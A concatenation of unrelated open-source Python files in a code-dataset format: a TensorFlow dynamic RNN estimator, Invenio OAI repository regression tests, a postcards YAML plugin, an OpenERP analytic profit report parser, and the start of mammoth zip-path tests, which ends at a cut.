    target_column: An initialized `TargetColumn`, used to calculate prediction
      and loss.
    problem_type: `ProblemType.CLASSIFICATION` or
      `ProblemType.LINEAR_REGRESSION`.
    prediction_type: `PredictionType.SINGLE_VALUE` or
      `PredictionType.MULTIPLE_VALUE`.
    optimizer: A subclass of `Optimizer`, an instance of an `Optimizer` or a
      string.
    sequence_feature_columns: An iterable containing all the feature columns
      describing sequence features. All items in the set should be instances
      of classes derived from `FeatureColumn`.
    context_feature_columns: An iterable containing all the feature columns
      describing context features, i.e., features that apply across all time
      steps. All items in the set should be instances of classes derived from
      `FeatureColumn`.
    predict_probabilities: A boolean indicating whether to predict probabilities
      for all classes. Must only be used with
      `ProblemType.CLASSIFICATION`.
    learning_rate: Learning rate used for optimization. This argument has no
      effect if `optimizer` is an instance of an `Optimizer`.
    gradient_clipping_norm: A float. Gradients will be clipped to this value.
    dropout_keep_probabilities: a list of dropout keep probabilities or `None`.
      If a list is given, it must have length `len(num_units) + 1`.
    sequence_length_key: The key that will be used to look up sequence length in
      the `features` dict.
    dtype: The dtype of the state and output of the given `cell`.
    parallel_iterations: Number of iterations to run in parallel. Values >> 1
      use more memory but take less time, while smaller values use less memory
      but computations take longer.
    swap_memory: Transparently swap the tensors produced in forward inference
      but needed for back prop from GPU to CPU. This allows training RNNs
      which would typically not fit on a single GPU, with very minimal (or no)
      performance penalty.
    name: A string that will be used to create a scope for the RNN.
  Returns:
    A model function to be passed to an `Estimator`.
  Raises:
    ValueError: `problem_type` is not one of
      `ProblemType.LINEAR_REGRESSION` or `ProblemType.CLASSIFICATION`.
    ValueError: `prediction_type` is not one of `PredictionType.SINGLE_VALUE`
      or `PredictionType.MULTIPLE_VALUE`.
    ValueError: `predict_probabilities` is `True` for `problem_type` other
      than `ProblemType.CLASSIFICATION`.
    ValueError: `len(dropout_keep_probabilities)` is not `len(num_units) + 1`.
  """
  # Validate argument combinations eagerly, before the model function is built.
  if problem_type not in (constants.ProblemType.CLASSIFICATION,
                          constants.ProblemType.LINEAR_REGRESSION):
    raise ValueError(
        'problem_type must be ProblemType.LINEAR_REGRESSION or '
        'ProblemType.CLASSIFICATION; got {}'.
        format(problem_type))
  if prediction_type not in (rnn_common.PredictionType.SINGLE_VALUE,
                             rnn_common.PredictionType.MULTIPLE_VALUE):
    raise ValueError(
        'prediction_type must be PredictionType.MULTIPLE_VALUEs or '
        'PredictionType.SINGLE_VALUE; got {}'.
        format(prediction_type))
  if (problem_type != constants.ProblemType.CLASSIFICATION
      and predict_probabilities):
    raise ValueError(
        'predict_probabilities can only be set to True for problem_type'
        ' ProblemType.CLASSIFICATION; got {}.'.format(problem_type))
  def _dynamic_rnn_model_fn(features, labels, mode):
    """The model to be passed to an `Estimator`."""
    with ops.name_scope(name):
      sequence_length = features.get(sequence_length_key)
      sequence_input = build_sequence_input(features,
                                            sequence_feature_columns,
                                            context_feature_columns)
      # Dropout is applied only in TRAIN mode.
      dropout = (dropout_keep_probabilities
                 if mode == model_fn.ModeKeys.TRAIN
                 else None)
      # This class promises to use the cell type selected by that function.
      cell = rnn_common.construct_rnn_cell(num_units, cell_type, dropout)
      # Initial state may be fed via STATE_PREFIX_i keys in `features`.
      initial_state = dict_to_state_tuple(features, cell)
      rnn_activations, final_state = construct_rnn(
          initial_state,
          sequence_input,
          cell,
          target_column.num_label_columns,
          dtype=dtype,
          parallel_iterations=parallel_iterations,
          swap_memory=swap_memory)
      loss = None  # Created below for modes TRAIN and EVAL.
      if prediction_type == rnn_common.PredictionType.MULTIPLE_VALUE:
        prediction_dict = rnn_common.multi_value_predictions(
            rnn_activations, target_column, problem_type, predict_probabilities)
        if mode != model_fn.ModeKeys.INFER:
          loss = _multi_value_loss(
              rnn_activations, labels, sequence_length, target_column, features)
      elif prediction_type == rnn_common.PredictionType.SINGLE_VALUE:
        prediction_dict = _single_value_predictions(
            rnn_activations, sequence_length, target_column,
            problem_type, predict_probabilities)
        if mode != model_fn.ModeKeys.INFER:
          loss = _single_value_loss(
              rnn_activations, labels, sequence_length, target_column, features)
      # Expose the final RNN state alongside the predictions so callers can
      # feed it back in as the next initial state.
      state_dict = state_tuple_to_dict(final_state)
      prediction_dict.update(state_dict)
      eval_metric_ops = None
      if mode != model_fn.ModeKeys.INFER:
        eval_metric_ops = rnn_common.get_eval_metric_ops(
            problem_type, prediction_type, sequence_length, prediction_dict,
            labels)
      train_op = None
      if mode == model_fn.ModeKeys.TRAIN:
        train_op = optimizers.optimize_loss(
            loss=loss,
            global_step=None,  # Get it internally.
            learning_rate=learning_rate,
            optimizer=optimizer,
            clip_gradients=gradient_clipping_norm,
            summaries=optimizers.OPTIMIZER_SUMMARIES)
      output_alternatives = _get_output_alternatives(prediction_type,
                                                     problem_type,
                                                     prediction_dict)
      return model_fn.ModelFnOps(mode=mode,
                                 predictions=prediction_dict,
                                 loss=loss,
                                 train_op=train_op,
                                 eval_metric_ops=eval_metric_ops,
                                 output_alternatives=output_alternatives)
  return _dynamic_rnn_model_fn
class DynamicRnnEstimator(estimator.Estimator):
  """An `Estimator` built on a dynamically unrolled RNN model function."""
  def __init__(self,
               problem_type,
               prediction_type,
               sequence_feature_columns,
               context_feature_columns=None,
               num_classes=None,
               num_units=None,
               cell_type='basic_rnn',
               optimizer='SGD',
               learning_rate=0.1,
               predict_probabilities=False,
               momentum=None,
               gradient_clipping_norm=5.0,
               dropout_keep_probabilities=None,
               model_dir=None,
               feature_engineering_fn=None,
               config=None):
    """Initializes a `DynamicRnnEstimator`.
    The input function passed to this `Estimator` optionally contains keys
    `RNNKeys.SEQUENCE_LENGTH_KEY`. The value corresponding to
    `RNNKeys.SEQUENCE_LENGTH_KEY` must be vector of size `batch_size` where
    entry `n` corresponds to the length of the `n`th sequence in the batch. The
    sequence length feature is required for batches of varying sizes. It will be
    used to calculate loss and evaluation metrics. If
    `RNNKeys.SEQUENCE_LENGTH_KEY` is not included, all sequences are assumed to
    have length equal to the size of dimension 1 of the input to the RNN.
    In order to specify an initial state, the input function must include keys
    `STATE_PREFIX_i` for all `0 <= i < n` where `n` is the number of nested
    elements in `cell.state_size`. The input function must contain values for
    all state components or none of them. If none are included, then the default
    (zero) state is used as an initial state. See the documentation for
    `dict_to_state_tuple` and `state_tuple_to_dict` for further details.
    The input function can call rnn_common.construct_rnn_cell() to obtain the
    same cell type that this class will select from arguments to __init__.
    The `predict()` method of the `Estimator` returns a dictionary with keys
    `STATE_PREFIX_i` for `0 <= i < n` where `n` is the number of nested elements
    in `cell.state_size`, along with `PredictionKey.CLASSES` for problem type
    `CLASSIFICATION` or `PredictionKey.SCORES` for problem type
    `LINEAR_REGRESSION`. The value keyed by
    `PredictionKey.CLASSES` or `PredictionKey.SCORES` has shape
    `[batch_size, padded_length]` in the multi-value case and shape
    `[batch_size]` in the single-value case. Here, `padded_length` is the
    largest value in the `RNNKeys.SEQUENCE_LENGTH` `Tensor` passed as input.
    Entry `[i, j]` is the prediction associated with sequence `i` and time step
    `j`. If the problem type is `CLASSIFICATION` and `predict_probabilities` is
    `True`, it will also include key `PredictionKey.PROBABILITIES`.
    Args:
      problem_type: whether the `Estimator` is intended for a regression or
        classification problem. Value must be one of
        `ProblemType.CLASSIFICATION` or `ProblemType.LINEAR_REGRESSION`.
      prediction_type: whether the `Estimator` should return a value for each
        step in the sequence, or just a single value for the final time step.
        Must be one of `PredictionType.SINGLE_VALUE` or
        `PredictionType.MULTIPLE_VALUE`.
      sequence_feature_columns: An iterable containing all the feature columns
        describing sequence features. All items in the iterable should be
        instances of classes derived from `FeatureColumn`.
      context_feature_columns: An iterable containing all the feature columns
        describing context features, i.e., features that apply across all time
        steps. All items in the set should be instances of classes derived from
        `FeatureColumn`.
      num_classes: the number of classes for a classification problem. Only
        used when `problem_type=ProblemType.CLASSIFICATION`.
      num_units: A list of integers indicating the number of units in the
        `RNNCell`s in each layer.
      cell_type: A subclass of `RNNCell` or one of 'basic_rnn,' 'lstm' or 'gru'.
      optimizer: The type of optimizer to use. Either a subclass of
        `Optimizer`, an instance of an `Optimizer`, a callback that returns an
        optimizer, or a string. Strings must be one of 'Adagrad', 'Adam',
        'Ftrl', 'Momentum', 'RMSProp' or 'SGD. See `layers.optimize_loss` for
        more details.
      learning_rate: Learning rate. This argument has no effect if `optimizer`
        is an instance of an `Optimizer`.
      predict_probabilities: A boolean indicating whether to predict
        probabilities for all classes. Used only if `problem_type` is
        `ProblemType.CLASSIFICATION`
      momentum: Momentum value. Only used if `optimizer_type` is 'Momentum'.
      gradient_clipping_norm: Parameter used for gradient clipping. If `None`,
        then no clipping is performed.
      dropout_keep_probabilities: a list of dropout probabilities or `None`.
        If a list is given, it must have length `len(num_units) + 1`. If
        `None`, then no dropout is applied.
      model_dir: The directory in which to save and restore the model graph,
        parameters, etc.
      feature_engineering_fn: Takes features and labels which are the output of
        `input_fn` and returns features and labels which will be fed into
        `model_fn`. Please check `model_fn` for a definition of features and
        labels.
      config: A `RunConfig` instance.
    Raises:
      ValueError: `problem_type` is not one of
        `ProblemType.LINEAR_REGRESSION` or `ProblemType.CLASSIFICATION`.
      ValueError: `problem_type` is `ProblemType.CLASSIFICATION` but
        `num_classes` is not specified.
      ValueError: `prediction_type` is not one of
        `PredictionType.MULTIPLE_VALUE` or `PredictionType.SINGLE_VALUE`.
    """
    # Pick a human-readable name for the model based on the two enums; the
    # name is forwarded to the model_fn below.
    if prediction_type == rnn_common.PredictionType.MULTIPLE_VALUE:
      name = 'MultiValueDynamicRNN'
    elif prediction_type == rnn_common.PredictionType.SINGLE_VALUE:
      name = 'SingleValueDynamicRNN'
    else:
      raise ValueError(
          'prediction_type must be one of PredictionType.MULTIPLE_VALUE or '
          'PredictionType.SINGLE_VALUE; got {}'.format(prediction_type))
    if problem_type == constants.ProblemType.LINEAR_REGRESSION:
      name += 'Regressor'
      target_column = layers.regression_target()
    elif problem_type == constants.ProblemType.CLASSIFICATION:
      if not num_classes:
        raise ValueError('For CLASSIFICATION problem_type, num_classes must be '
                         'specified.')
      target_column = layers.multi_class_target(n_classes=num_classes)
      name += 'Classifier'
    else:
      raise ValueError(
          'problem_type must be either ProblemType.LINEAR_REGRESSION '
          'or ProblemType.CLASSIFICATION; got {}'.format(
              problem_type))
    # 'Momentum' cannot be passed down as a plain string because it needs the
    # extra `momentum` argument, so it is instantiated here.
    if optimizer == 'Momentum':
      optimizer = momentum_opt.MomentumOptimizer(learning_rate, momentum)
    dynamic_rnn_model_fn = _get_dynamic_rnn_model_fn(
        cell_type=cell_type,
        num_units=num_units,
        target_column=target_column,
        problem_type=problem_type,
        prediction_type=prediction_type,
        optimizer=optimizer,
        sequence_feature_columns=sequence_feature_columns,
        context_feature_columns=context_feature_columns,
        predict_probabilities=predict_probabilities,
        learning_rate=learning_rate,
        gradient_clipping_norm=gradient_clipping_norm,
        dropout_keep_probabilities=dropout_keep_probabilities,
        name=name)
    super(DynamicRnnEstimator, self).__init__(
        model_fn=dynamic_rnn_model_fn,
        model_dir=model_dir,
        config=config,
        feature_engineering_fn=feature_engineering_fn)
|
cul-it/Invenio | refs/heads/master | modules/bibharvest/lib/oai_repository_regression_tests.py | 3 | # -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""OAI Repository Regression Test Suite."""
__revision__ = "$Id$"
import unittest
import time
import re
from cStringIO import StringIO
from invenio.config import CFG_SITE_URL, \
CFG_OAI_SLEEP, \
CFG_OAI_LOAD, \
CFG_OAI_ID_FIELD
from invenio.intbitset import intbitset
from invenio import oai_repository_server, search_engine
from invenio.testutils import make_test_suite, run_test_suite, \
test_web_page_content, merge_error_messages
class OAIRepositoryWebPagesAvailabilityTest(unittest.TestCase):
    """Check that the OAI Repository server pages respond."""
    def test_oai_server_pages_availability(self):
        """oairepository - availability of OAI server pages"""
        baseurl = CFG_SITE_URL + '/oai2d'
        # Fast verbs first, then the rate-limited ("sleepy") ones.
        queries = ['?verb=Identify',
                   '?verb=ListMetadataFormats',
                   '?verb=ListSets',
                   '?verb=ListRecords',
                   '?verb=GetRecord']
        problems = []
        for query in queries:
            url = baseurl + query
            # oai2d refuses too frequent access for every verb except
            # Identify and ListMetadataFormats, so pause before those.
            if not (url.endswith('Identify') or
                    url.endswith('ListMetadataFormats')):
                time.sleep(CFG_OAI_SLEEP)
            problems.extend(test_web_page_content(url,
                                                  expected_text=
                                                  '</OAI-PMH>'))
        if problems:
            self.fail(merge_error_messages(problems))
class TestSelectiveHarvesting(unittest.TestCase):
    """Test set, from and until parameters used to do selective harvesting."""
    def test_set(self):
        """oairepository - testing selective harvesting with 'set' parameter"""
        # Records 10 and 17 belong to the cern:experiment set in the demo
        # data.  NOTE(review): assumes the standard Invenio demo site records.
        self.assertEqual(intbitset([10, 17]), oai_repository_server.oai_get_recid_list(set_spec="cern:experiment"))
        self.assert_("Multifractal analysis of minimum bias events" in \
                     ''.join([oai_repository_server.print_record(recID) for recID in \
                              oai_repository_server.oai_get_recid_list(set_spec="cern:experiment")]))
        self.assert_("Multifractal analysis of minimum bias events" not in \
                     ''.join([oai_repository_server.print_record(recID) for recID in \
                              oai_repository_server.oai_get_recid_list(set_spec="cern:theory")]))
        # An unknown set must yield an empty (falsy) record list.
        self.failIf(oai_repository_server.oai_get_recid_list(set_spec="nonExistingSet"))
    def test_from_and_until(self):
        """oairepository - testing selective harvesting with 'from' and 'until' parameters"""
        req = StringIO()
        # List available records, get datestamps and play with them
        oai_repository_server.oai_list_records_or_identifiers(req, {'verb': 'ListIdentifiers', 'metadataPrefix': 'marcxml'})
        identifiers = req.getvalue()
        # Pairs of (oai id, datestamp) extracted from the XML response.
        datestamps = re.findall('<identifier>(?P<id>.*?)</identifier>\s*<datestamp>(?P<date>.*?)</datestamp>', identifiers, re.M)
        sample_datestamp = datestamps[0][1] # Take one datestamp
        sample_oai_id = datestamps[0][0] # Take corresponding oai id
        sample_id = search_engine.perform_request_search(p=sample_oai_id,
                                                         f=CFG_OAI_ID_FIELD)[0] # Find corresponding system number id
        # There must be some datestamps
        self.assertNotEqual([], datestamps)
        # We must be able to retrieve an id with the date we have just found
        self.assert_(sample_id in oai_repository_server.oai_get_recid_list(fromdate=sample_datestamp))
        self.assert_(sample_id in oai_repository_server.oai_get_recid_list(untildate=sample_datestamp))
        self.assert_(sample_id in oai_repository_server.oai_get_recid_list(untildate=sample_datestamp, \
                                                                           fromdate=sample_datestamp))
        # Same, with short format date. Eg 2007-12-13
        self.assert_(sample_id in oai_repository_server.oai_get_recid_list(fromdate=sample_datestamp.split('T')[0]))
        self.assert_(sample_id in oai_repository_server.oai_get_recid_list(untildate=sample_datestamp.split('T')[0]))
        self.assert_(sample_id in oai_repository_server.oai_get_recid_list(fromdate=sample_datestamp.split('T')[0], \
                                                                           untildate=sample_datestamp.split('T')[0]))
        # At later date (year after) we should not find our id again
        sample_datestamp_year = int(sample_datestamp[0:4])
        sample_datestamp_rest = sample_datestamp[4:]
        later_datestamp = str(sample_datestamp_year + 1) + sample_datestamp_rest
        self.assert_(sample_id not in oai_repository_server.oai_get_recid_list(fromdate=later_datestamp))
        # At earlier date (year before) we should not find our id again
        earlier_datestamp = str(sample_datestamp_year - 1) + sample_datestamp_rest
        self.assert_(sample_id not in oai_repository_server.oai_get_recid_list(untildate=earlier_datestamp))
        # From earliest date to latest date must include all oai records
        dates = [(time.mktime(time.strptime(date[1], "%Y-%m-%dT%H:%M:%SZ")), date[1]) for date in datestamps]
        dates = dict(dates)
        # Python 2: dict.keys() returns a plain list that can be sorted in place.
        sorted_times = dates.keys()
        sorted_times.sort()
        earliest_datestamp = dates[sorted_times[0]]
        latest_datestamp = dates[sorted_times[-1]]
        self.assertEqual(oai_repository_server.oai_get_recid_list(), \
                         oai_repository_server.oai_get_recid_list(fromdate=earliest_datestamp, \
                                                                  untildate=latest_datestamp))
    def test_resumption_token(self):
        """oairepository - testing harvesting with bad resumption token"""
        # Non existing resumptionToken
        req = StringIO()
        oai_repository_server.oai_list_records_or_identifiers(req, {'resumptionToken': 'foobar', 'verb': 'ListRecords'})
        # The server must answer with the OAI-PMH badResumptionToken error.
        self.assert_('badResumptionToken' in req.getvalue())
class TestPerformance(unittest.TestCase):
    """Timing checks for the repository's ListRecords responses."""
    def setUp(self):
        """Setting up some variables"""
        # One response page serves at most CFG_OAI_LOAD records, so cap
        # the expectation accordingly.
        served = len(oai_repository_server.oai_get_recid_list("", "", ""))
        self.number_of_records = min(served, CFG_OAI_LOAD)
    def test_response_speed_oai(self):
        """oairepository - speed of response for oai_dc output"""
        allowed_seconds_per_record_oai = 0.02
        limit = self.number_of_records * allowed_seconds_per_record_oai
        start = time.time()
        oai_repository_server.oai_list_records_or_identifiers(
            StringIO(), {'metadataPrefix': 'oai_dc', 'verb': 'ListRecords'})
        elapsed = time.time() - start
        if elapsed > limit:
            self.fail("""Response for ListRecords with metadataPrefix=oai_dc took too much time:
%s seconds.
Limit: %s seconds""" % (elapsed, limit))
    def test_response_speed_marcxml(self):
        """oairepository - speed of response for marcxml output"""
        allowed_seconds_per_record_marcxml = 0.05
        limit = self.number_of_records * allowed_seconds_per_record_marcxml
        start = time.time()
        oai_repository_server.oai_list_records_or_identifiers(
            StringIO(), argd={'metadataPrefix': 'marcxml', 'verb': 'ListRecords'})
        elapsed = time.time() - start
        if elapsed > limit:
            self.fail("""Response for ListRecords with metadataPrefix=marcxml took too much time:\n
%s seconds.
Limit: %s seconds""" % (elapsed, limit))
# Aggregate all test cases of this module into the suite picked up by the
# Invenio test runner.
TEST_SUITE = make_test_suite(OAIRepositoryWebPagesAvailabilityTest,
                             TestSelectiveHarvesting,
                             TestPerformance)
if __name__ == "__main__":
    # warn_user=True: these tests hit the live demo site database.
    run_test_suite(TEST_SUITE, warn_user=True)
|
hastexo/edx-platform | refs/heads/master | openedx/core/djangoapps/debug/__init__.py | 12133432 | |
spectrumone/online-shop-template | refs/heads/master | myshop/coupons/migrations/__init__.py | 12133432 | |
LethusTI/supportcenter | refs/heads/master | vendor/django/tests/regressiontests/null_fk_ordering/__init__.py | 12133432 | |
nirmeshk/oh-mainline | refs/heads/master | vendor/packages/Django/tests/modeltests/raw_query/__init__.py | 12133432 | |
abertschi/postcards | refs/heads/master | postcards/plugin_folder_yaml/postcards_folder_yaml.py | 1 | #!/usr/bin/env python
# encoding: utf-8
from postcards.plugin_folder.postcards_folder import PostcardsFolder
import sys
import random
import ntpath
import os
import yaml
class PostcardsFolderYaml(PostcardsFolder):
    """
    Send postcards with images from a yaml config.
    The yaml document is a flat list with an even number of entries,
    alternating postcard text and image file name (relative to the
    configured picture folder).
    """
    def can_handle_command(self, command):
        """Return True for the sub-commands this plugin implements."""
        # `in` already yields a bool; no ternary needed.
        return command in ['validate']
    def handle_command(self, command, args):
        """Execute the 'validate' sub-command: parse config, check the yaml."""
        if command == 'validate':
            config = self._read_json_file(args.config_file[0], 'config')
            payload = config.get('payload')
            if not payload:
                self.logger.warn("error: config file does not contain payload")
                sys.exit(-1)
            folder_path, yaml_path = self._validate_cli(payload, args)
            doc = self.validate_and_parse_yaml(folder_path, yaml_path)
            for d in doc:
                self.logger.info("> entry: {}".format(d))
            self.logger.info("validation is successful")
    def build_plugin_subparser(self, subparsers):
        """Register the 'validate' sub-command on the shared argparse parser."""
        parser = subparsers.add_parser('validate', help='validate yaml file',
                                       description='check that yaml file contains the proper format ' +
                                                   'and that all pictures referenced exist.')
        parser.add_argument('-c', '--config',
                            nargs=1,
                            required=True,
                            type=str,
                            help='location to the configuration file (default: ./config.json)',
                            default=[os.path.join(os.getcwd(), 'config.json')],
                            dest='config_file')
    def get_img_and_text(self, payload, cli_args):
        """
        Return the next postcard as ``{'img': <open binary file>, 'text': str}``.
        Consumes the first (text, image) pair of the yaml document and writes
        the remainder back, unless ``payload['remove_yaml']`` is False, in
        which case the first pair is reused and nothing is removed.
        """
        folder_path, yaml_path = self._validate_cli(payload, cli_args)
        document = self.validate_and_parse_yaml(folder_path, yaml_path)
        if len(document) == 0:
            self.logger.warn("nothing left to do, no more pictures in yaml file left.")
            sys.exit(1)
        remove_yaml = payload.get("remove_yaml")
        if remove_yaml in [True, None]:
            # Default behavior: consume the leading (text, image) pair.
            text = document.pop(0)
            img_name = document.pop(0)
        else:
            self.logger.info("remove_yaml = False, do not remove entries form yaml")
            text = document[0]
            img_name = document[1]
        img_path = os.path.join(folder_path, img_name)
        self._write_back_yaml(document, yaml_path)
        move_info = 'moving to sent directory' if payload.get('move') else 'no move'
        self.logger.info('choosing image \'{}\' ({})'.format(img_path, move_info))
        self.logger.info('choosing text \'{}\''.format(text))
        # The caller is responsible for closing this handle.
        img_file = open(img_path, 'rb')
        if payload.get('move'):
            # NOTE(review): the file is moved while still open; fine on POSIX
            # but may fail on Windows -- confirm the target platform.
            self._move_to_sent(folder_path, img_path)
        return {
            'img': img_file,
            'text': text
        }
    def validate_and_parse_yaml(self, folder_path, yaml_path):
        """
        Read and validate the yaml document; both paths are absolute.
        Checks that the document has an even number of entries and that every
        referenced image exists on disk.
        :return: the parsed document (flat list alternating text and image
                 name); exits the process with a negative status on invalidity
        """
        try:
            # `with` guarantees the handle is closed even if read() raises.
            with open(yaml_path, 'r') as f:
                data = f.read()
        except Exception:
            self.logger.error("error: can not read yaml file {}".format(yaml_path))
            sys.exit(-1)
        self.logger.info("reading yaml file at {}".format(yaml_path))
        try:
            document = yaml.load(data, Loader=yaml.FullLoader)
        except Exception:
            self.logger.error("error: can not parse yaml file {}".format(yaml_path))
            sys.exit(-2)
        if len(document) % 2 != 0:
            self.logger.error("error: uneven number of entries in yaml file.")
            sys.exit(-3)
        # Entries at odd indexes are image names; verify each one exists.
        i = 1
        while i < len(document):
            img_path = document[i]
            img_abs_path = os.path.join(folder_path, img_path)
            if not os.path.isfile(img_abs_path):
                self.logger.error(
                    "error: path entry {}: '{}' in yaml file does not exist on disk..".format(i, img_abs_path))
                sys.exit(-4)
            i = i + 2
        return document
    def _validate_cli(self, folder_payload, cli_args):
        """Check folder/yaml settings in the payload; return their absolute paths."""
        payload = folder_payload
        if not payload.get('folder'):
            self.logger.error("no folder set in configuration")
            sys.exit(1)
        folder_location = self._make_absolute_path(payload.get('folder'))
        if not os.path.isdir(folder_location):
            self.logger.error("picture directory '{}' does not exist".format(folder_location))
            sys.exit(1)
        if not payload.get('yaml'):
            self.logger.error("no yaml file set in configuration")
            sys.exit(1)
        yaml_location = self._make_absolute_path(payload.get('yaml'))
        if not os.path.isfile(yaml_location):
            self.logger.error("yaml file {} does not exist".format(yaml_location))
            sys.exit(1)
        self.logger.debug("cli validation successful")
        return folder_location, yaml_location
    def _write_back_yaml(self, document, location):
        """Serialize `document` and overwrite the yaml file at `location`."""
        with open(location, "w") as fh:
            fh.write(yaml.dump(document))
def main():
    # CLI entry point: delegate argument handling to the plugin base class.
    PostcardsFolderYaml().main(sys.argv[1:])
# def _tmp():
#     cards = PostcardsFolderYaml()
#     yaml = os.path.join(os.getcwd(), '../../tmp/test.yaml')
#     pic_path = os.path.join(os.getcwd(), '../../tmp')
#
#     cards.validate_and_parse_yaml(pic_path, yaml)
if __name__ == '__main__':
    main()
|
hbrunn/OpenUpgrade | refs/heads/master | addons/hr_timesheet_invoice/report/account_analytic_profit.py | 96 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.report import report_sxw
from openerp.osv import osv
class account_analytic_profit(report_sxw.rml_parse):
    """RML report parser computing profitability of analytic timesheet lines."""
    def __init__(self, cr, uid, name, context):
        super(account_analytic_profit, self).__init__(cr, uid, name, context=context)
        # Expose the helpers below to the report template.
        self.localcontext.update({
            'lines': self._lines,
            'user_ids': self._user_ids,
            'journal_ids': self._journal_ids,
            'line': self._line,
        })
    def _user_ids(self, lines):
        """Return browse records of the distinct users appearing in `lines`."""
        user_obj = self.pool['res.users']
        ids=list(set([b.user_id.id for b in lines]))
        return user_obj.browse(self.cr, self.uid, ids)
    def _journal_ids(self, form, user_id):
        """Return the distinct analytic journals used by `user_id` in the period."""
        line_obj = self.pool['account.analytic.line']
        journal_obj = self.pool['account.analytic.journal']
        line_ids=line_obj.search(self.cr, self.uid, [
            ('date', '>=', form['date_from']),
            ('date', '<=', form['date_to']),
            ('journal_id', 'in', form['journal_ids'][0][2]),
            ('user_id', '=', user_id),
        ])
        ids=list(set([b.journal_id.id for b in line_obj.browse(self.cr, self.uid, line_ids)]))
        return journal_obj.browse(self.cr, self.uid, ids)
    def _line(self, form, journal_ids, user_ids):
        """
        Aggregate analytic lines per invoicing rate.
        Returns a list of dicts keyed by rate ('name', 'amount', 'cost',
        'unit_amount', 'amount_th', 'profit', 'eff').
        """
        line_obj = self.pool['account.analytic.line']
        # (removed unused lookup of 'product.product')
        price_obj = self.pool['product.pricelist']
        ids=line_obj.search(self.cr, self.uid, [
            ('date', '>=', form['date_from']),
            ('date', '<=', form['date_to']),
            ('journal_id', 'in', journal_ids),
            ('user_id', 'in', user_ids),
        ])
        res={}
        for line in line_obj.browse(self.cr, self.uid, ids):
            if line.account_id.pricelist_id:
                if line.account_id.to_invoice:
                    if line.to_invoice:
                        # Invoicing rate set on the line itself.
                        id=line.to_invoice.id
                        name=line.to_invoice.name
                        discount=line.to_invoice.factor
                    else:
                        # No rate: factor 1.0 means fully discounted (nothing billed).
                        name="/"
                        discount=1.0
                        id = -1
                else:
                    name="Fixed"
                    discount=0.0
                    id=0
                pl=line.account_id.pricelist_id.id
                price=price_obj.price_get(self.cr, self.uid, [pl], line.product_id.id, line.unit_amount or 1.0, line.account_id.partner_id.id)[pl]
            else:
                name="/"
                discount=1.0
                id = -1
                price=0.0
            if id not in res:
                res[id]={'name': name, 'amount': 0, 'cost':0, 'unit_amount':0,'amount_th':0}
            # Theoretical billable amount for this line.
            xxx = round(price * line.unit_amount * (1-(discount or 0.0)), 2)
            res[id]['amount_th']+=xxx
            if line.invoice_id:
                # Pro-rate the invoiced amount over all lines of the same invoice.
                self.cr.execute('select id from account_analytic_line where invoice_id=%s', (line.invoice_id.id,))
                tot = 0
                for lid in self.cr.fetchall():
                    lid2 = line_obj.browse(self.cr, self.uid, lid[0])
                    pl=lid2.account_id.pricelist_id.id
                    price=price_obj.price_get(self.cr, self.uid, [pl], lid2.product_id.id, lid2.unit_amount or 1.0, lid2.account_id.partner_id.id)[pl]
                    tot += price * lid2.unit_amount * (1-(discount or 0.0))
                if tot:
                    procent = line.invoice_id.amount_untaxed / tot
                    res[id]['amount'] += xxx * procent
                else:
                    res[id]['amount'] += xxx
            else:
                res[id]['amount'] += xxx
            res[id]['cost']+=line.amount
            res[id]['unit_amount']+=line.unit_amount
        for id in res:
            # Costs are stored negative, hence profit = amount + cost.
            res[id]['profit']=res[id]['amount']+res[id]['cost']
            res[id]['eff']=res[id]['cost'] and '%d' % (-res[id]['amount'] / res[id]['cost'] * 100,) or 0.0
        return res.values()
    def _lines(self, form):
        """Return browse records of all analytic lines selected by the wizard form."""
        line_obj = self.pool['account.analytic.line']
        ids=line_obj.search(self.cr, self.uid, [
            ('date', '>=', form['date_from']),
            ('date', '<=', form['date_to']),
            ('journal_id', 'in', form['journal_ids'][0][2]),
            ('user_id', 'in', form['employee_ids'][0][2]),
        ])
        return line_obj.browse(self.cr, self.uid, ids)
class report_account_analytic_profit(osv.AbstractModel):
    """Registers the analytic-profit report and wraps the RML parser class."""
    _name = 'report.hr_timesheet_invoice.report_analyticprofit'
    _inherit = 'report.abstract_report'
    _template = 'hr_timesheet_invoice.report_analyticprofit'
    # Legacy parser providing the rendering context for the template.
    _wrapped_report_class = account_analytic_profit
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
mwilliamson/python-mammoth | refs/heads/master | tests/zips_tests.py | 1 | from nose.tools import istest, assert_equal
from mammoth import zips
@istest
def split_path_splits_zip_paths_on_last_forward_slash():
    # Only the final slash separates dirname from basename.
    cases = [
        ("a/b", ("a", "b")),
        ("a/b/c", ("a/b", "c")),
        ("/a/b/c", ("/a/b", "c")),
    ]
    for path, expected in cases:
        assert_equal(expected, zips.split_path(path))
@istest
def when_path_has_no_forward_slashes_then_split_path_returns_empty_dirname():
    # A bare name has no directory component.
    result = zips.split_path("name")
    assert_equal(("", "name"), result)
@istest
def join_path_joins_arguments_with_forward_slashes():
    for args, expected in [
        (("a", "b"), "a/b"),
        (("a/b", "c"), "a/b/c"),
        (("/a/b", "c"), "/a/b/c"),
    ]:
        assert_equal(expected, zips.join_path(*args))
@istest
def empty_parts_are_ignored_when_joining_paths():
    # Empty strings contribute no path segment.
    for args, expected in [
        (("a", ""), "a"),
        (("", "b"), "b"),
